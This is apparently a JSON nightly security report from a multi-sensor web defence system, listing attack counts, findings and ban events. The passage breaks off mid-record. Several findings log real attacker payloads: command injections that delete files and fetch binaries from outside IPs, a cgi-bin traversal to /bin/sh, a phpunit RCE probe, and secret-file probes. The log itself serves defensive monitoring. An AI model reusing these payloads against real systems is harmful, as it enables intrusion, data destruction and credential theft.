{
 "night": "2026-10-07",
 "window": {
  "start": "2026-10-06T18:00:00+02:00",
  "end": "2026-10-07T06:00:00+02:00"
 },
 "target": {
  "label": "Johannesburg, ZA",
  "lat": -26.2041,
  "lon": 28.0473
 },
 "generated_at": "2026-10-07T11:35:13Z",
 "totals": {
  "attacks": 2744,
  "edge_attacks": 2093,
  "edge_new_bans": 39,
  "new_bans": 103,
  "requests": 38307,
  "blocked_at_edge": 733,
  "active_bans": 68,
  "sensors": 4
 },
 "sensors": [
  {
   "id": "edge",
   "kind": "edge",
   "attacks": 2093,
   "new_bans": 39,
   "attacks_24h": 4527,
   "active_bans": 34,
   "categories": {
    "cms-probe": 1317,
    "secret-probe": 718,
    "protocol": 52,
    "scanner": 4,
    "behaviour": 1
   }
  },
  {
   "id": "web-1",
   "kind": "web",
   "attacks": 29,
   "new_bans": 6,
   "attacks_24h": 81,
   "active_bans": 4,
   "categories": {
    "cms-probe": 13,
    "secret-probe": 12,
    "scanner": 4
   }
  },
  {
   "id": "web-2",
   "kind": "web",
   "attacks": 45,
   "new_bans": 10,
   "attacks_24h": 120,
   "active_bans": 2,
   "categories": {
    "protocol": 13,
    "code-injection": 12,
    "scanner": 11,
    "cms-probe": 6,
    "secret-probe": 3
   }
  },
  {
   "id": "web-3",
   "kind": "web",
   "attacks": 577,
   "new_bans": 48,
   "attacks_24h": 1059,
   "active_bans": 28,
   "categories": {
    "protocol": 161,
    "secret-probe": 137,
    "code-injection": 117,
    "scanner": 104,
    "cms-probe": 57
   }
  }
 ],
 "categories": {
  "cms-probe": 1393,
  "secret-probe": 870,
  "protocol": 226,
  "code-injection": 129,
  "scanner": 123,
  "behaviour": 1
 },
 "findings": [
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 635,
   "addresses": 31,
   "sensor": "edge",
   "first": "2026-10-06T18:12:00+02:00",
   "method": "GET",
   "path": "/.env",
   "ip": "142.93.0.66"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 83,
   "addresses": 5,
   "sensor": "edge",
   "first": "2026-10-06T20:02:00+02:00",
   "method": "GET",
   "path": "/wp-config.php",
   "ip": "195.178.110.199"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 1,
   "addresses": 1,
   "sensor": "edge",
   "first": "2026-10-06T22:25:00+02:00",
   "method": "GET",
   "path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
   "ip": "8.163.68.110"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 4,
   "addresses": 4,
   "sensor": "edge",
   "first": "2026-10-06T20:39:00+02:00",
   "method": "GET",
   "path": "/manager/html",
   "ip": "40.67.173.117"
  },
  {
   "severity": "high",
   "rule": "Run of missing-page requests",
   "rule_id": "BW-BEH-01",
   "type": "behaviour",
   "requests": 1,
   "addresses": 1,
   "sensor": "edge",
   "first": "2026-10-06T21:45:00+02:00",
   "method": "GET",
   "path": "/api/package.json",
   "ip": "45.148.10.74"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 11,
   "addresses": 5,
   "sensor": "web-1",
   "first": "2026-10-06T18:39:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "64.247.196.151"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 1,
   "addresses": 1,
   "sensor": "web-1",
   "first": "2026-10-07T05:42:00+02:00",
   "method": "GET",
   "path": "/ai/credentials.json",
   "ip": "93.123.109.101"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 4,
   "addresses": 4,
   "sensor": "web-1",
   "first": "2026-10-06T18:48:00+02:00",
   "method": "POST",
   "path": "/mcp",
   "ip": "40.124.116.159"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 8,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-06T21:42:00+02:00",
   "method": "POST",
   "path": "/wp-json/batch/v1",
   "ip": "159.223.66.123"
  },
  {
   "severity": "medium",
   "rule": "PHP script probe",
   "rule_id": "BW-PHP-01",
   "type": "php-probe",
   "requests": 5,
   "addresses": 3,
   "sensor": "web-1",
   "first": "2026-10-06T18:31:00+02:00",
   "method": "GET",
   "path": "/admin/config.php",
   "ip": "186.248.73.98"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 10,
   "addresses": 5,
   "sensor": "web-2",
   "first": "2026-10-06T18:43:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "223.123.65.54"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 3,
   "addresses": 3,
   "sensor": "web-2",
   "first": "2026-10-06T18:46:00+02:00",
   "method": "GET",
   "path": "/.svn/wc.db",
   "ip": "193.32.162.156"
  },
  {
   "severity": "critical",
   "rule": "Shell command injection",
   "rule_id": "BW-RCE-02",
   "type": "command-injection",
   "requests": 2,
   "addresses": 2,
   "sensor": "web-2",
   "first": "2026-10-06T20:14:00+02:00",
   "method": "GET",
   "path": "/shell?cd+/var/dev;rm+-rf+*;wget+http[:]//176.65.139.139/bins/xnxnxnxnxnxnxnxnx86_64xnxn+-O+\u2026",
   "ip": "93.152.221.85"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 11,
   "addresses": 11,
   "sensor": "web-2",
   "first": "2026-10-06T18:48:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "186.248.73.98"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 4,
   "addresses": 3,
   "sensor": "web-2",
   "first": "2026-10-06T18:49:00+02:00",
   "method": "GET",
   "path": "/HNAP1",
   "ip": "157.230.20.243"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 125,
   "addresses": 22,
   "sensor": "web-3",
   "first": "2026-10-06T18:02:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "64.247.196.151"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 114,
   "addresses": 12,
   "sensor": "web-3",
   "first": "2026-10-06T19:20:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "103.216.170.129"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 12,
   "addresses": 5,
   "sensor": "web-3",
   "first": "2026-10-06T20:19:00+02:00",
   "method": "GET",
   "path": "/credentials.json",
   "ip": "45.138.12.24"
  },
  {
   "severity": "critical",
   "rule": "Shell command injection",
   "rule_id": "BW-RCE-02",
   "type": "command-injection",
   "requests": 3,
   "addresses": 2,
   "sensor": "web-3",
   "first": "2026-10-06T22:40:00+02:00",
   "method": "GET",
   "path": "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//158.255.83.176:\u2026",
   "ip": "158.255.83.176"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 104,
   "addresses": 91,
   "sensor": "web-3",
   "first": "2026-10-06T18:37:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "186.248.73.98"
  }
 ],
 "events": [
  {
   "t": "2026-10-06T18:02:00+02:00",
   "ip": "64.247.196.151",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T18:02:00+02:00",
   "ip": "64.247.196.151",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T18:12:00+02:00",
   "ip": "142.93.0.66",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T18:12:00+02:00",
   "ip": "209.38.248.17",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T18:12:00+02:00",
   "ip": "142.93.0.66",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T18:31:00+02:00",
   "ip": "186.248.73.98",
   "type": "php-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/admin/config.php",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T18:33:00+02:00",
   "ip": "91.92.41.115",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T18:37:00+02:00",
   "ip": "186.248.73.98",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T18:39:00+02:00",
   "ip": "143.244.57.90",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T18:39:00+02:00",
   "ip": "64.247.196.151",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T18:39:00+02:00",
   "ip": "64.247.196.151",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T18:43:00+02:00",
   "ip": "223.123.65.54",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T18:43:00+02:00",
   "ip": "223.123.65.54",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T18:45:00+02:00",
   "ip": "193.32.162.156",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T18:46:00+02:00",
   "ip": "193.32.162.156",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T18:46:00+02:00",
   "ip": "193.32.162.156",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.svn/wc.db",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T18:47:00+02:00",
   "ip": "136.109.107.235",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T18:48:00+02:00",
   "ip": "40.124.116.159",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/mcp",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T18:48:00+02:00",
   "ip": "186.248.73.98",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T18:49:00+02:00",
   "ip": "157.230.20.243",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/HNAP1",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T18:57:00+02:00",
   "ip": "68.69.177.112",
   "type": "php-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T18:59:00+02:00",
   "ip": "34.73.22.186",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T19:15:00+02:00",
   "ip": "45.138.12.10",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T19:18:00+02:00",
   "ip": "34.23.170.28",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T19:20:00+02:00",
   "ip": "103.216.170.129",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T19:20:00+02:00",
   "ip": "103.216.170.129",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T19:22:00+02:00",
   "ip": "158.23.176.177",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T19:35:00+02:00",
   "ip": "118.145.104.105",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T19:46:00+02:00",
   "ip": "64.89.161.82",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T20:01:00+02:00",
   "ip": "169.58.214.236",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T20:02:00+02:00",
   "ip": "195.178.110.199",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T20:02:00+02:00",
   "ip": "195.178.110.199",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/wp-config.php",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T20:06:00+02:00",
   "ip": "193.32.162.156",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T20:07:00+02:00",
   "ip": "47.95.234.23",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T20:14:00+02:00",
   "ip": "93.152.221.85",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T20:14:00+02:00",
   "ip": "93.152.221.85",
   "type": "command-injection",
   "kind": "finding",
   "severity": "critical",
   "path": "/shell?cd+/var/dev;rm+-rf+*;wget+http[:]//176.65.139.139/bins/xnxnxnxnxnxnxnxnx86_64xnxn+-O+\u2026",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T20:19:00+02:00",
   "ip": "45.138.12.24",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/credentials.json",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T20:31:00+02:00",
   "ip": "35.201.196.175",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T20:32:00+02:00",
   "ip": "45.138.12.10",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T20:39:00+02:00",
   "ip": "40.67.173.117",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/manager/html",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:02:00+02:00",
   "ip": "45.148.10.14",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:15:00+02:00",
   "ip": "34.53.119.204",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:16:00+02:00",
   "ip": "20.214.170.255",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:37:00+02:00",
   "ip": "102.244.97.185",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T21:39:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T21:42:00+02:00",
   "ip": "159.223.66.123",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/wp-json/batch/v1",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T21:45:00+02:00",
   "ip": "45.148.10.74",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:45:00+02:00",
   "ip": "195.178.110.15",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:45:00+02:00",
   "ip": "45.148.10.74",
   "type": "behaviour",
   "kind": "finding",
   "severity": "high",
   "path": "/api/package.json",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:53:00+02:00",
   "ip": "8.231.188.50",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T21:58:00+02:00",
   "ip": "169.58.214.236",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T22:02:00+02:00",
   "ip": "45.225.135.21",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T22:07:00+02:00",
   "ip": "138.122.21.19",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T22:14:00+02:00",
   "ip": "190.111.110.13",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T22:24:00+02:00",
   "ip": "8.163.68.110",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T22:25:00+02:00",
   "ip": "8.163.68.110",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T22:26:00+02:00",
   "ip": "34.133.94.182",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T22:27:00+02:00",
   "ip": "193.32.162.175",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T22:32:00+02:00",
   "ip": "34.23.170.28",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T22:40:00+02:00",
   "ip": "158.255.83.176",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T22:40:00+02:00",
   "ip": "158.255.83.176",
   "type": "command-injection",
   "kind": "finding",
   "severity": "critical",
   "path": "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//158.255.83.176:\u2026",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T22:46:00+02:00",
   "ip": "82.102.18.222",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T22:50:00+02:00",
   "ip": "81.171.72.135",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T22:50:00+02:00",
   "ip": "81.171.72.93",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T23:05:00+02:00",
   "ip": "45.78.224.85",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T23:16:00+02:00",
   "ip": "47.95.234.23",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T23:18:00+02:00",
   "ip": "20.214.145.90",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T23:43:00+02:00",
   "ip": "172.86.86.158",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T23:44:00+02:00",
   "ip": "177.8.71.123",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T23:51:00+02:00",
   "ip": "216.81.248.89",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T23:52:00+02:00",
   "ip": "41.38.160.135",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-07T00:10:00+02:00",
   "ip": "73.53.43.220",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-07T00:12:00+02:00",
   "ip": "172.86.86.158",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T00:14:00+02:00",
   "ip": "91.92.242.37",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T00:18:00+02:00",
   "ip": "62.60.130.117",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T00:33:00+02:00",
   "ip": "94.154.43.125",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T00:45:00+02:00",
   "ip": "62.146.226.80",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T00:49:00+02:00",
   "ip": "177.8.71.123",
   "type": "php-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T00:50:00+02:00",
   "ip": "193.32.162.164",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T01:10:00+02:00",
   "ip": "83.143.112.7",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T01:16:00+02:00",
   "ip": "160.176.73.178",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-07T01:27:00+02:00",
   "ip": "193.32.162.175",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T01:33:00+02:00",
   "ip": "160.176.73.178",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-07T01:40:00+02:00",
   "ip": "124.158.13.141",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-07T01:43:00+02:00",
   "ip": "45.156.87.131",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T01:44:00+02:00",
   "ip": "187.87.144.234",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T01:47:00+02:00",
   "ip": "82.102.18.222",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T02:23:00+02:00",
   "ip": "172.68.151.42",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T02:29:00+02:00",
   "ip": "64.62.156.222",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T02:29:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T02:41:00+02:00",
   "ip": "199.165.159.33",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T02:42:00+02:00",
   "ip": "199.165.159.65",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T02:47:00+02:00",
   "ip": "184.105.247.194",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T02:48:00+02:00",
   "ip": "172.69.223.156",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T02:58:00+02:00",
   "ip": "103.46.186.85",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T03:06:00+02:00",
   "ip": "169.40.142.224",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-07T03:14:00+02:00",
   "ip": "172.71.119.90",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T03:50:00+02:00",
   "ip": "111.90.180.172",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T03:50:00+02:00",
   "ip": "221.159.119.6",
   "type": "command-injection",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T03:53:00+02:00",
   "ip": "45.138.12.188",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T03:53:00+02:00",
   "ip": "193.32.162.164",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T03:58:00+02:00",
   "ip": "104.244.74.39",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T03:58:00+02:00",
   "ip": "45.238.235.2",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T04:05:00+02:00",
   "ip": "165.22.59.27",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T04:12:00+02:00",
   "ip": "93.123.109.101",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-07T04:53:00+02:00",
   "ip": "45.70.164.148",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T04:57:00+02:00",
   "ip": "216.126.237.47",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T04:59:00+02:00",
   "ip": "45.148.10.120",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:11:00+02:00",
   "ip": "45.138.12.188",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:15:00+02:00",
   "ip": "216.218.206.68",
   "type": "secret-probe",
   "kind": "ban",
